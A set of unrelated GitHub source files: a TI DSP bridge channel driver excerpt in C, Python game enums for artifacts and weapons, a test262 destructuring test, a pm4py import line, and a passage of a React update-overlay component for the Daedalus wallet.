chnl_mgr_obj->ap_channel[ch_id]; mgr_info->open_channels = chnl_mgr_obj->open_channels; mgr_info->dw_type = chnl_mgr_obj->dw_type; /* total # of chnls */ mgr_info->max_channels = chnl_mgr_obj->max_channels; } else { status = -EFAULT; } } else { status = -ECHRNG; } } else { status = -EFAULT; } return status; } /* * ======== bridge_chnl_idle ======== * Idles a particular channel. */ int bridge_chnl_idle(struct chnl_object *chnl_obj, u32 timeout, bool flush_data) { s8 chnl_mode; struct chnl_mgr *chnl_mgr_obj; int status = 0; DBC_REQUIRE(chnl_obj); chnl_mode = chnl_obj->chnl_mode; chnl_mgr_obj = chnl_obj->chnl_mgr_obj; if (CHNL_IS_OUTPUT(chnl_mode) && !flush_data) { /* Wait for IO completions, up to the specified timeout: */ status = bridge_chnl_flush_io(chnl_obj, timeout); } else { status = bridge_chnl_cancel_io(chnl_obj); /* Reset the byte count and put channel back in ready state. */ chnl_obj->bytes_moved = 0; chnl_obj->dw_state &= ~CHNL_STATECANCEL; } return status; } /* * ======== bridge_chnl_open ======== * Open a new half-duplex channel to the DSP board. 
*/ int bridge_chnl_open(struct chnl_object **chnl, struct chnl_mgr *hchnl_mgr, s8 chnl_mode, u32 ch_id, const struct chnl_attr *pattrs) { int status = 0; struct chnl_mgr *chnl_mgr_obj = hchnl_mgr; struct chnl_object *pchnl = NULL; struct sync_object *sync_event = NULL; /* Ensure DBC requirements: */ DBC_REQUIRE(chnl != NULL); DBC_REQUIRE(pattrs != NULL); DBC_REQUIRE(hchnl_mgr != NULL); *chnl = NULL; /* Validate Args: */ if (pattrs->uio_reqs == 0) { status = -EINVAL; } else { if (!hchnl_mgr) { status = -EFAULT; } else { if (ch_id != CHNL_PICKFREE) { if (ch_id >= chnl_mgr_obj->max_channels) status = -ECHRNG; else if (chnl_mgr_obj->ap_channel[ch_id] != NULL) status = -EALREADY; } else { /* Check for free channel */ status = search_free_channel(chnl_mgr_obj, &ch_id); } } } if (status) goto func_end; DBC_ASSERT(ch_id < chnl_mgr_obj->max_channels); /* Create channel object: */ pchnl = kzalloc(sizeof(struct chnl_object), GFP_KERNEL); if (!pchnl) { status = -ENOMEM; goto func_end; } /* Protect queues from io_dpc: */ pchnl->dw_state = CHNL_STATECANCEL; /* Allocate initial IOR and IOC queues: */ pchnl->free_packets_list = create_chirp_list(pattrs->uio_reqs); pchnl->pio_requests = create_chirp_list(0); pchnl->pio_completions = create_chirp_list(0); pchnl->chnl_packets = pattrs->uio_reqs; pchnl->cio_cs = 0; pchnl->cio_reqs = 0; sync_event = kzalloc(sizeof(struct sync_object), GFP_KERNEL); if (sync_event) sync_init_event(sync_event); else status = -ENOMEM; if (!status) { pchnl->ntfy_obj = kmalloc(sizeof(struct ntfy_object), GFP_KERNEL); if (pchnl->ntfy_obj) ntfy_init(pchnl->ntfy_obj); else status = -ENOMEM; } if (!status) { if (pchnl->pio_completions && pchnl->pio_requests && pchnl->free_packets_list) { /* Initialize CHNL object fields: */ pchnl->chnl_mgr_obj = chnl_mgr_obj; pchnl->chnl_id = ch_id; pchnl->chnl_mode = chnl_mode; pchnl->user_event = sync_event; pchnl->sync_event = sync_event; /* Get the process handle */ pchnl->process = current->tgid; pchnl->pcb_arg = 0; pchnl->bytes_moved = 0; /* Default to proc-copy */ pchnl->chnl_type = CHNL_PCPY; } else { status = -ENOMEM; } } if (status) { /* Free memory */ if (pchnl->pio_completions) { free_chirp_list(pchnl->pio_completions); pchnl->pio_completions = NULL; pchnl->cio_cs = 0; } if (pchnl->pio_requests) { free_chirp_list(pchnl->pio_requests); pchnl->pio_requests = NULL; } if (pchnl->free_packets_list) { free_chirp_list(pchnl->free_packets_list); pchnl->free_packets_list = NULL; } kfree(sync_event); sync_event = NULL; if (pchnl->ntfy_obj) { ntfy_delete(pchnl->ntfy_obj); kfree(pchnl->ntfy_obj); pchnl->ntfy_obj = NULL; } kfree(pchnl); } else { /* Insert channel object in channel manager: */ chnl_mgr_obj->ap_channel[pchnl->chnl_id] = pchnl; spin_lock_bh(&chnl_mgr_obj->chnl_mgr_lock); chnl_mgr_obj->open_channels++; spin_unlock_bh(&chnl_mgr_obj->chnl_mgr_lock); /* Return result... */ pchnl->dw_state = CHNL_STATEREADY; *chnl = pchnl; } func_end: DBC_ENSURE((!status && pchnl) || (*chnl == NULL)); return status; } /* * ======== bridge_chnl_register_notify ======== * Registers for events on a particular channel. 
*/ int bridge_chnl_register_notify(struct chnl_object *chnl_obj, u32 event_mask, u32 notify_type, struct dsp_notification *hnotification) { int status = 0; DBC_ASSERT(!(event_mask & ~(DSP_STREAMDONE | DSP_STREAMIOCOMPLETION))); if (event_mask) status = ntfy_register(chnl_obj->ntfy_obj, hnotification, event_mask, notify_type); else status = ntfy_unregister(chnl_obj->ntfy_obj, hnotification); return status; } /* * ======== create_chirp_list ======== * Purpose: * Initialize a queue of channel I/O Request/Completion packets. * Parameters: * chirps: Number of Chirps to allocate. * Returns: * Pointer to queue of IRPs, or NULL. * Requires: * Ensures: */ static struct lst_list *create_chirp_list(u32 chirps) { struct lst_list *chirp_list; struct chnl_irp *chnl_packet_obj; u32 i; chirp_list = kzalloc(sizeof(struct lst_list), GFP_KERNEL); if (chirp_list) { INIT_LIST_HEAD(&chirp_list->head); /* Make N chirps and place on queue. */ for (i = 0; (i < chirps) && ((chnl_packet_obj = make_new_chirp()) != NULL); i++) { lst_put_tail(chirp_list, (struct list_head *)chnl_packet_obj); } /* If we couldn't allocate all chirps, free those allocated: */ if (i != chirps) { free_chirp_list(chirp_list); chirp_list = NULL; } } return chirp_list; } /* * ======== free_chirp_list ======== * Purpose: * Free the queue of Chirps. */ static void free_chirp_list(struct lst_list *chirp_list) { DBC_REQUIRE(chirp_list != NULL); while (!LST_IS_EMPTY(chirp_list)) kfree(lst_get_head(chirp_list)); kfree(chirp_list); } /* * ======== make_new_chirp ======== * Allocate the memory for a new channel IRP. */ static struct chnl_irp *make_new_chirp(void) { struct chnl_irp *chnl_packet_obj; chnl_packet_obj = kzalloc(sizeof(struct chnl_irp), GFP_KERNEL); if (chnl_packet_obj != NULL) { /* lst_init_elem only resets the list's member values. */ lst_init_elem(&chnl_packet_obj->link); } return chnl_packet_obj; } /* * ======== search_free_channel ======== * Search for a free channel slot in the array of channel pointers. */ static int search_free_channel(struct chnl_mgr *chnl_mgr_obj, u32 *chnl) { int status = -ENOSR; u32 i; DBC_REQUIRE(chnl_mgr_obj); for (i = 0; i < chnl_mgr_obj->max_channels; i++) { if (chnl_mgr_obj->ap_channel[i] == NULL) { status = 0; *chnl = i; break; } } return status; }
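/*
 * Editor's note: a minimal usage sketch of the channel API defined above, not
 * part of the original driver. It assumes a valid struct chnl_mgr *mgr
 * obtained elsewhere, and that CHNL_MODETODSP is the output-mode constant
 * declared in the driver's channel headers; the queue depth of 16 is an
 * arbitrary example value.
 */
static int chnl_open_sketch(struct chnl_mgr *mgr)
{
	struct chnl_object *chnl = NULL;
	struct chnl_attr attrs = { .uio_reqs = 16 };
	int status;

	/* Let the manager pick the first free slot. */
	status = bridge_chnl_open(&chnl, mgr, CHNL_MODETODSP,
				  CHNL_PICKFREE, &attrs);
	if (status)
		return status;

	/* ... queue CHIRPs (I/O request packets) on the channel here ... */

	/* Wait up to 1000 ms for pending output, then leave the channel idle. */
	return bridge_chnl_idle(chnl, 1000, false);
}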
{ "pile_set_name": "Github" }
import smart_imports smart_imports.all() class INDEX_ORDER_TYPE(rels_django.DjangoEnum): records = (('BY_LEVEL', 'by_level', 'по уровню'), ('BY_NAME', 'by_name', 'по имени')) class ARTIFACT_TYPE(rels_django.DjangoEnum): records = (('USELESS', 0, 'хлам'), ('MAIN_HAND', 1, 'основная рука'), ('OFF_HAND', 2, 'вторая рука'), ('PLATE', 3, 'доспех'), ('AMULET', 4, 'амулет'), ('HELMET', 5, 'шлем'), ('CLOAK', 6, 'плащ'), ('SHOULDERS', 7, 'наплечники'), ('GLOVES', 8, 'перчатки'), ('PANTS', 9, 'штаны'), ('BOOTS', 10, 'обувь'), ('RING', 11, 'кольцо')) class ARTIFACT_POWER_TYPE(rels_django.DjangoEnum): distribution = rels.Column() records = (('MOST_MAGICAL', 0, 'магическая', power.PowerDistribution(0.1, 0.9)), ('MAGICAL', 1, 'ближе к магии', power.PowerDistribution(0.25, 0.75)), ('NEUTRAL', 2, 'равновесие', power.PowerDistribution(0.5, 0.5)), ('PHYSICAL', 3, 'ближе к физике', power.PowerDistribution(0.75, 0.25)), ('MOST_PHYSICAL', 4, 'физическая', power.PowerDistribution(0.9, 0.1))) class ARTIFACT_RECORD_STATE(rels_django.DjangoEnum): records = (('ENABLED', 0, 'в игре'), ('DISABLED', 1, 'вне игры')) class RARITY(rels_django.DjangoEnum): probability = rels.Column() max_integrity = rels.Column() preference_rating = rels.Column() cost = rels.Column() records = (('NORMAL', 0, 'обычный артефакт', c.NORMAL_ARTIFACT_PROBABILITY, c.ARTIFACT_MAX_INTEGRITY, 1.0, 1.0), ('RARE', 1, 'редкий артефакт', c.RARE_ARTIFACT_PROBABILITY, int(c.ARTIFACT_MAX_INTEGRITY * c.ARTIFACT_RARE_MAX_INTEGRITY_MULTIPLIER), 1.5, 3.0), ('EPIC', 2, 'эпический артефакт', c.EPIC_ARTIFACT_PROBABILITY, int(c.ARTIFACT_MAX_INTEGRITY * c.ARTIFACT_EPIC_MAX_INTEGRITY_MULTIPLIER), 2.0, 9.0)) class ARTIFACT_EFFECT(rels_django.DjangoEnum): records = (('PHYSICAL_DAMAGE', 0, 'мощь'), ('MAGICAL_DAMAGE', 1, 'колдовство'), ('INITIATIVE', 2, 'хорошая реакция'), ('HEALTH', 3, 'здоровье'), ('EXPERIENCE', 4, 'повышение интуиции'), ('POWER', 5, 'хитрость'), ('CONCENTRATION', 6, 'концентрация'), ('SPEED', 7, 'скороход'), ('BAG', 8, 'карманы'), ('NO_EFFECT', 666, 'нет эффекта'), ('GREAT_PHYSICAL_DAMAGE', 1000, 'небывалая мощь'), ('GREAT_MAGICAL_DAMAGE', 1001, 'могучее колдовство'), ('GREAT_INITIATIVE', 1002, 'превосходная реакция'), ('GREAT_HEALTH', 1003, 'невероятное здоровье'), ('GREAT_EXPERIENCE', 1004, 'сверхинтуиция'), ('GREAT_POWER', 1005, 'особая хитрость'), # ('GREAT_ENERGY', 1006, 'большой астральный сосуд'), ('GREAT_SPEED', 1007, 'неутомимый скороход'), ('GREAT_BAG', 1008, 'большие карманы'), ('REST_LENGTH', 1009, 'выносливость'), ('RESURRECT_LENGTH', 1010, 'живучесть'), ('IDLE_LENGTH', 1011, 'деятельность'), ('CONVICTION', 1012, 'убеждение'), ('CHARM', 1013, 'очарование'), # ('SPIRITUAL_CONNECTION', 1014, 'духовная связь'), ('PEACE_OF_MIND', 1015, 'душевное равновесие'), ('SPECIAL_AURA', 1016, 'особая аура'), ('REGENERATION', 1017, 'регенерация'), ('LAST_CHANCE', 1018, 'последний шанс'), ('ICE', 1019, 'лёд'), ('FLAME', 1020, 'пламя'), ('POISON', 1021, 'яд'), ('VAMPIRE_STRIKE', 1022, 'вампиризм'), ('ESPRIT', 1023, 'живость ума'), ('TERRIBLE_VIEW', 1024, 'ужасный вид'), ('CRITICAL_HIT', 1025, 'точные атаки'), ('ASTRAL_BARRIER', 1026, 'астральная преграда'), ('CLOUDED_MIND', 1027, 'затуманенный разум'), ('LUCK_OF_STRANGER', 1028, 'удача странника'), ('LUCK_OF_HERO', 1029, 'удача героя'), ('FORTITUDE', 1030, 'крепость духа'), ('IDEOLOGICAL', 1031, 'идейность'), ('UNBREAKABLE', 1032, 'нерушимость'), ('SPEEDUP', 1033, 'ускорение'), ('RECKLESSNESS', 1034, 'безрассудность'), ('CHILD_GIFT', 100001, 'детский подарок')) WEAPON_TYPE = 
tt_artifacts_relations.WEAPON_TYPE noun = lexicon_dictionary.noun # TODO: use real artifacts instead thar enum class STANDARD_WEAPON(rels_django.DjangoEnum): weapon_type = rels.Column(unique=False, no_index=True) utg_name = rels.Column(no_index=True) records = (('WEAPON_0', 0, 'булава', WEAPON_TYPE.TYPE_1, noun(['булава', 'булавы', 'булаве', 'булаву', 'булавой', 'булаве', 'булавы', 'булав', 'булавам', 'булавы', 'булавами', 'булавах'], 'но,жр')), ('WEAPON_1', 1, 'дубина', WEAPON_TYPE.TYPE_2, noun(['дубина', 'дубины', 'дубине', 'дубины', 'дубинами', 'дубинах', 'дубины', 'дубин', 'дубинам', 'дубины', 'дубинами', 'дубинах'], 'но,жр')), ('WEAPON_2', 2, 'жало на хвосте', WEAPON_TYPE.TYPE_29, noun(['жало', 'жала', 'жалу', 'жало', 'жалом', 'жале', 'жалы', 'жал', 'жалам', 'жалы', 'жалами', 'жалах'], 'но,жр')), ('WEAPON_3', 3, 'жвалы', WEAPON_TYPE.TYPE_14, noun(['', '', '', '', '', '', 'жвалы', 'жвал', 'жвалам', 'жвалы', 'жвалами', 'жвалах'], 'мн,но,жр')), ('WEAPON_4', 4, 'касание энергетическое', WEAPON_TYPE.TYPE_30, noun(['касание', 'касания', 'касанию', 'касание', 'касанием', 'касаниях', 'касания', 'касаний', 'касаниям', 'касания', 'касаниями', 'касаниях'], 'но,жр')), ('WEAPON_5', 5, 'катар', WEAPON_TYPE.TYPE_3, noun(['катар', 'катара', 'катару', 'катар', 'катаром', 'катаре', 'катары', 'катаров', 'катарам', 'катары', 'катарами', 'катарах'], 'но,мр')), ('WEAPON_6', 6, 'кинжал', WEAPON_TYPE.TYPE_4, noun(['кинжал', 'кинжала', 'кинжалу', 'кинжал', 'кинжалом', 'кинжале', 'кинжалы', 'кинжалов', 'кинжалам', 'кинжалы', 'кинжалами', 'кинжалах'], 'но,мр')), ('WEAPON_7', 7, 'кистень', WEAPON_TYPE.TYPE_5, noun(['кистень', 'кистеня', 'кистеню', 'кистень', 'кистенем', 'кистене', 'кистени', 'кистеней', 'кистеням', 'кистени', 'кистенями', 'кистенями'], 'но,мр')), ('WEAPON_8', 8, 'клешня', WEAPON_TYPE.TYPE_15, noun(['клешня', 'клешни', 'клешне', 'клешню', 'клешнёй', 'клешне', 'клешни', 'клешней', 'клешням', 'клешни', 'клешнями', 'клешнях'], 'но,жр')), ('WEAPON_9', 9, 'клыки', WEAPON_TYPE.TYPE_16, noun(['', '', '', '', '', '', 'клыки', 'клыков', 'клыкам', 'клаки', 'клыками', 'клыках'], 'мн,но,мр')), ('WEAPON_10', 10, 'клюв', WEAPON_TYPE.TYPE_17, noun(['клюв', 'клюва', 'клюву', 'клюв', 'клювом', 'клюве', 'клювы', 'клювов', 'клювам', 'клювы', 'клювами', 'клювах'], 'но,мр')), ('WEAPON_11', 11, 'когти', WEAPON_TYPE.TYPE_18, noun(['', '', '', '', '', '', 'когти', 'когтей', 'когтям', 'когти', 'когтями', 'когтях'], 'мн,но,мр')), ('WEAPON_12', 12, 'копьё', WEAPON_TYPE.TYPE_6, noun(['копьё', 'копья', 'копью', 'копьё', 'копьём', 'копье', 'копья', 'копий', 'копьям', 'копья', 'копьями', 'копьях'], 'но,ср')), ('WEAPON_13', 13, 'кулак', WEAPON_TYPE.TYPE_19, noun(['кулак', 'кулака', 'кулаку', 'кулак', 'кулаком', 'кулаке', 'кулаки', 'кулаков', 'кулакам', 'кулаки', 'кулаками', 'кулаках'], 'но,мр')), ('WEAPON_14', 14, 'меч', WEAPON_TYPE.TYPE_7, noun(['меч', 'меча', 'мечу', 'меч', 'мечом', 'мечу', 'мечи', 'мечей', 'мечам', 'мечи', 'мечами', 'мечах'], 'но,мр')), ('WEAPON_15', 15, 'нож', WEAPON_TYPE.TYPE_8, noun(['нож', 'ножа', 'ножу', 'нож', 'ножом', 'ноже', 'ножи', 'ножей', 'ножам', 'ножи', 'ножами', 'ножах'], 'но,мр')), ('WEAPON_16', 16, 'палка', WEAPON_TYPE.TYPE_20, noun(['палка', 'палки', 'палке', 'палку', 'палкой', 'палке', 'палки', 'палок', 'палкам', 'палки', 'палками', 'палках'], 'но,жр')), ('WEAPON_17', 17, 'пика', WEAPON_TYPE.TYPE_6, noun(['пика', 'пики', 'пике', 'пику', 'пикой', 'пике', 'пики', 'пик', 'пикам', 'пики', 'пиками', 'пиках'], 'но,жр')), ('WEAPON_18', 18, 'плеть', WEAPON_TYPE.TYPE_9, noun(['плеть', 'плети', 
'плети', 'плеть', 'плетью', 'плетье', 'плети', 'плетей', 'плетям', 'плети', 'плетями', 'плетях'], 'но,жр')), ('WEAPON_19', 19, 'посох', WEAPON_TYPE.TYPE_10, noun(['посох', 'посоха', 'посоху', 'посох', 'посохом', 'посохе', 'посохи', 'посохов', 'посохам', 'посохи', 'посохами', 'посохах'], 'но,мр')), ('WEAPON_20', 20, 'рог', WEAPON_TYPE.TYPE_21, noun(['рог', 'рога', 'рогу', 'рог', 'рогом', 'роге', '', '', '', '', '', ''], 'ед,но,мр')), ('WEAPON_21', 21, 'рога', WEAPON_TYPE.TYPE_22, noun(['', '', '', '', '', '', 'рога', 'рогов', 'рогам', 'рога', 'рогами', 'рогах'], 'мн,но,мр')), ('WEAPON_22', 22, 'сабля', WEAPON_TYPE.TYPE_11, noun(['сабля', 'сабли', 'сабле', 'саблю', 'саблей', 'сабле', 'сабли', 'сабель', 'саблям', 'сабли', 'саблями', 'саблях'], 'но,жр')), ('WEAPON_23', 23, 'топор', WEAPON_TYPE.TYPE_12, noun(['топор', 'топора', 'топору', 'топор', 'топором', 'топаре', 'топоры', 'топоров', 'топорам', 'топоры', 'топорами', 'топорах'], 'но,мр')), ('WEAPON_24', 24, 'хопеш', WEAPON_TYPE.TYPE_23, noun(['хопеш', 'хопеша', 'хопешу', 'хопеш', 'хопешем', 'хопеше', 'хопеши', 'хопешей', 'хопешам', 'хопеши', 'хопешами', 'хопешах'], 'но,мр')), ('WEAPON_25', 25, 'шипы', WEAPON_TYPE.TYPE_24, noun(['', '', '', '', '', '', 'шипы', 'шипов', 'шипам', 'шипы', 'шипами', 'шипах'], 'мн,но,мр')), ('WEAPON_26', 26, 'хватательная лапа', WEAPON_TYPE.TYPE_31, noun(['лапа', 'лапы', 'лапе', 'лапу', 'лапой', 'лапе', 'лапы', 'лап', 'лапам', 'лапы', 'лапами', 'лапах'], 'но,жр')), ('WEAPON_27', 27, 'копыто', WEAPON_TYPE.TYPE_32, noun(['копыто', 'копыта', 'копыту', 'копыто', 'копытом', 'копыте', 'копыта', 'копыт', 'копытам', 'копыта', 'копытами', 'копытах'], 'но,ср')), ('WEAPON_28', 28, 'нога', WEAPON_TYPE.TYPE_33, noun(['нога', 'ноги', 'ноге', 'ногу', 'ногой', 'ноге', 'ноги', 'ног', 'ногам', 'ноги', 'ногами', 'ногах'], 'но,жр')), ('WEAPON_29', 29, 'серп', WEAPON_TYPE.TYPE_34, noun(['серп', 'серпа', 'серпу', 'серп', 'серпом', 'серпе', 'серпы', 'серпов', 'серпам', 'серпы', 'серпами', 'серпах'], 'но,мр')), ('WEAPON_30', 30, 'пила', WEAPON_TYPE.TYPE_26, noun(['пила', 'пилы', 'пиле', 'пилу', 'пилой', 'пиле', 'пилы', 'пил', 'пилам', 'пилы', 'пилами', 'пилах'], 'но,жр')), ('WEAPON_31', 31, 'праща', WEAPON_TYPE.TYPE_35, noun(['праща', 'пращи', 'праще', 'пращу', 'пращой', 'праще', 'пращи', 'пращей', 'пращам', 'пращи', 'пращами', 'пращах'], 'но,жр')), ('WEAPON_32', 32, 'лук', WEAPON_TYPE.TYPE_36, noun(['лук', 'лука', 'луку', 'лук', 'луком', 'луке', 'луки', 'луков', 'лукам', 'луки', 'луками', 'луках'], 'но,мр')), ('WEAPON_33', 33, 'арбалет', WEAPON_TYPE.TYPE_37, noun(['арбалет', 'арбалета', 'арбалету', 'арбалет', 'арбалетом', 'арбалете', 'арбалеты', 'арбалетов', 'арбалетам', 'арбалеты', 'арбалетами', 'арбалетах'], 'но,мр')), ('WEAPON_34', 34, 'молот', WEAPON_TYPE.TYPE_38, noun(['молот', 'молота', 'молоту', 'молот', 'молотом', 'молоте', 'молоты', 'молотов', 'молотам', 'молоты', 'молотами', 'молотах'], 'но,мр')), ('WEAPON_35', 35, 'шипастый хвост', WEAPON_TYPE.TYPE_39, noun(['хвост', 'хвоста', 'хвосту', 'хвост', 'хвостом', 'хвосте', 'хвосты', 'хвостов', 'хвостам', 'хвосты', 'хвостами', 'хвостах'], 'но,мр')))
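# Editor's note: a short, hedged sketch of reading the enum tables above. It
# is not part of the original module and assumes only the standard rels
# record attributes (.value, .text) plus the extra columns declared in the
# class bodies (cost, distribution, weapon_type, ...).
def _describe_rarity(rarity):
    # e.g. _describe_rarity(RARITY.RARE) -> 'редкий артефакт (cost x3.0)'
    return '%s (cost x%s)' % (rarity.text, rarity.cost)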
{ "pile_set_name": "Github" }
// This file was procedurally generated from the following sources: // - src/dstr-binding-for-await/obj-ptrn-id-init-fn-name-fn.case // - src/dstr-binding-for-await/default/for-await-of-async-func-const-async.template /*--- description: SingleNameBinding assigns name to "anonymous" functions (for-await-of statement) esid: sec-for-in-and-for-of-statements-runtime-semantics-labelledevaluation features: [destructuring-binding, async-iteration] flags: [generated, async] info: | IterationStatement : for await ( ForDeclaration of AssignmentExpression ) Statement [...] 2. Return ? ForIn/OfBodyEvaluation(ForDeclaration, Statement, keyResult, lexicalBinding, labelSet, async). 13.7.5.13 Runtime Semantics: ForIn/OfBodyEvaluation [...] 4. Let destructuring be IsDestructuring of lhs. [...] 6. Repeat [...] j. If destructuring is false, then [...] k. Else i. If lhsKind is assignment, then [...] ii. Else if lhsKind is varBinding, then [...] iii. Else, 1. Assert: lhsKind is lexicalBinding. 2. Assert: lhs is a ForDeclaration. 3. Let status be the result of performing BindingInitialization for lhs passing nextValue and iterationEnv as arguments. [...] 13.3.3.7 Runtime Semantics: KeyedBindingInitialization SingleNameBinding : BindingIdentifier Initializer_opt [...] 6. If Initializer is present and v is undefined, then [...] d. If IsAnonymousFunctionDefinition(Initializer) is true, then i. Let hasNameProperty be HasOwnProperty(v, "name"). ii. ReturnIfAbrupt(hasNameProperty). iii. If hasNameProperty is false, perform SetFunctionName(v, bindingId). ---*/ var iterCount = 0; var asyncIter = (async function*() { yield* [{}]; })(); async function fn() { for await (const { fn = function () {}, xFn = function x() {} } of asyncIter) { assert.sameValue(fn.name, 'fn'); assert.notSameValue(xFn.name, 'xFn'); iterCount += 1; } } fn() .then(() => assert.sameValue(iterCount, 1, 'iteration occurred as expected'), $DONE) .then($DONE, $DONE);
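// Editor's note: a standalone illustration (not part of the generated test
// above) of the SetFunctionName rule it exercises, using the same harness
// assert helpers: an anonymous function used as a destructuring default gets
// the binding identifier's name, while a named function expression keeps its
// own name.
var { f = function () {} } = {};
assert.sameValue(f.name, 'f');

var { g = function named() {} } = {};
assert.notSameValue(g.name, 'g');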
{ "pile_set_name": "Github" }
from pm4py.simulation import tree_generator, playout, montecarlo
{ "pile_set_name": "Github" }
// @flow import React, { Component } from 'react'; import { observer } from 'mobx-react'; import SVGInline from 'react-svg-inline'; import classnames from 'classnames'; import { get } from 'lodash'; import { defineMessages, intlShape, FormattedHTMLMessage } from 'react-intl'; import { Button } from 'react-polymorph/lib/components/Button'; import { Checkbox } from 'react-polymorph/lib/components/Checkbox'; import { CheckboxSkin } from 'react-polymorph/lib/skins/simple/CheckboxSkin'; import { Link } from 'react-polymorph/lib/components/Link'; import { LinkSkin } from 'react-polymorph/lib/skins/simple/LinkSkin'; import { ButtonSkin } from 'react-polymorph/lib/skins/simple/ButtonSkin'; import { ButtonSpinnerSkin } from 'react-polymorph/lib/skins/simple/ButtonSpinnerSkin'; import ReactMarkdown from 'react-markdown'; import News from '../../domains/News'; import styles from './AppUpdateOverlay.scss'; import DialogCloseButton from '../widgets/DialogCloseButton'; import ProgressBarLarge from '../widgets/ProgressBarLarge'; import externalLinkIcon from '../../assets/images/link-ic.inline.svg'; const messages = defineMessages({ title: { id: 'appUpdate.overlay.title', defaultMessage: '!!!Software update available!', description: '"title" for the App Update Overlay', }, subtitle: { id: 'appUpdate.overlay.subtitle', defaultMessage: '!!!You are currently running Daedalus version {currentAppVersion}.<br />Daedalus version {availableAppVersion} is now available to download.', description: '"subtitle" for the App Update Overlay', }, checkboxLabel: { id: 'appUpdate.overlay.checkboxLabel', defaultMessage: '!!!I understand that I need to complete the installation before starting Daedalus.', description: '"checkboxLabel" for the App Update Overlay', }, buttonLaunchInstallerLabel: { id: 'appUpdate.overlay.button.launchInstaller.label', defaultMessage: '!!!Quit Daedalus and start the installation', description: '"buttonLaunchInstallerLabel" for the App Update Overlay', }, buttonInstallUpdateLabel: { id: 'appUpdate.overlay.button.installUpdate.label', defaultMessage: '!!!Install the update and restart Daedalus', description: '"buttonInstallUpdateLabel" for the App Update Overlay', }, postponeInstallLinkLabel: { id: 'appUpdate.overlay.postponeInstall.link.label', defaultMessage: '!!!Postpone the update', description: '"manualUpdateLinkLabel" for the App Update Overlay', }, installingUpdateLabel: { id: 'appUpdate.overlay.installingUpdate.link.label', defaultMessage: '!!!Installing update...', description: '"installingUpdateLabel" for the App Update Overlay', }, downloadProgressLabel: { id: 'appUpdate.overlay.downloadProgressLabel', defaultMessage: '!!!Download in progress', description: '"downloadProgressLabel" for the App Update Overlay', }, downloadTimeLeft: { id: 'appUpdate.overlay.downloadTimeLeft', defaultMessage: '!!!{downloadTimeLeft} left', description: '"downloadTimeLeft" for the App Update Overlay', }, downloadProgressData: { id: 'appUpdate.overlay.downloadProgressData', defaultMessage: '!!!({totalDownloaded} of {totalDownloadSize} downloaded)', description: '"downloadProgressData" for the App Update Overlay', }, manualUpdateDescriptionError: { id: 'appUpdate.overlay.manualUpdate.description.error', defaultMessage: '!!!We were unable to launch the update installer automatically.', description: '"manualUpdateDescriptionError" for the App Update Overlay', }, manualUpdateDescriptionErrorLinux: { id: 'appUpdate.overlay.manualUpdate.description.errorLinux', defaultMessage: '!!!We were unable to install the 
update.', description: '"manualUpdateDescriptionErrorLinux" for the App Update Overlay', }, manualUpdateDescriptionAction: { id: 'appUpdate.overlay.manualUpdate.description.action', defaultMessage: '!!!Please manually update Daedalus to its latest version.', description: '"manualUpdateDescriptionAction" for the App Update Overlay', }, manualUpdateButtonLabel: { id: 'appUpdate.overlay.manualUpdate.button.label', defaultMessage: '!!!Follow instructions and manually update', description: '"manualUpdateButtonLabel" for the App Update Overlay', }, manualUpdateButtonUrl: { id: 'appUpdate.overlay.manualUpdate.button.url', defaultMessage: '!!!https://daedaluswallet.io/en/download/', description: '"manualUpdateButtonUrl" for the App Update Overlay', }, }); type Props = { update: News.News, onClose: Function, downloadTimeLeft: string, totalDownloaded: string, totalDownloadSize: string, availableAppVersion: string, currentAppVersion: string, downloadProgress: number, isUpdateDownloaded: boolean, isAutomaticUpdateFailed: boolean, isWaitingToQuitDaedalus: boolean, onInstallUpdate: Function, onExternalLinkClick: Function, onPostponeUpdate: Function, installationProgress: number, isLinux: boolean, }; type State = { areTermsOfUseAccepted: boolean, }; @observer export default class AppUpdateOverlay extends Component<Props, State> { static contextTypes = { intl: intlShape.isRequired, }; state = { areTermsOfUseAccepted: false, }; toggleAcceptance = () => { this.setState(prevState => ({ areTermsOfUseAccepted: !prevState.areTermsOfUseAccepted, })); }; contentClickHandler(event: SyntheticMouseEvent<HTMLElement>) { const linkUrl = get(event, ['target', 'href']); if (linkUrl) { event.preventDefault(); event.stopPropagation(); this.props.onExternalLinkClick(linkUrl); } } progressActions = () => { const { intl } = this.context; const { downloadTimeLeft, totalDownloaded, totalDownloadSize, downloadProgress, } = this.props; return ( <div className={styles.downloadProgress}> <div className={styles.downloadProgressContent}> <p className={styles.downloadProgressLabel}> {intl.formatMessage(messages.downloadProgressLabel)} </p> <p className={styles.downloadProgressData}> <b> {intl.formatMessage(messages.downloadTimeLeft, { downloadTimeLeft, })} </b>{' '} {intl.formatMessage(messages.downloadProgressData, { totalDownloaded, totalDownloadSize, })} </p> </div> <ProgressBarLarge progress={downloadProgress} /> </div> ); }; openInstallerAction = () => { const { intl } = this.context; const { onInstallUpdate, onPostponeUpdate, isWaitingToQuitDaedalus, isLinux, installationProgress, } = this.props; const { areTermsOfUseAccepted } = this.state; const isCheckboxDisabled = isWaitingToQuitDaedalus; const checkboxStyles = classnames([ styles.checkbox, isCheckboxDisabled ? styles.disabled : null, ]); const isButtonDisabled = !areTermsOfUseAccepted || isWaitingToQuitDaedalus; const buttonStyles = classnames([ styles.button, isButtonDisabled ? styles.disabled : null, isWaitingToQuitDaedalus ? styles.installing : null, ]); const buttonLabel = isLinux ? messages.buttonInstallUpdateLabel : messages.buttonLaunchInstallerLabel; const postponeLinkStyles = classnames([ styles.postponeLink, !isLinux && isWaitingToQuitDaedalus ? styles.disabled : null, isLinux && isWaitingToQuitDaedalus ? styles.noLink : null, ]); const postponeLabel = isLinux && isWaitingToQuitDaedalus ? messages.installingUpdateLabel : messages.postponeInstallLinkLabel; const postponeAction = !isWaitingToQuitDaedalus ? 
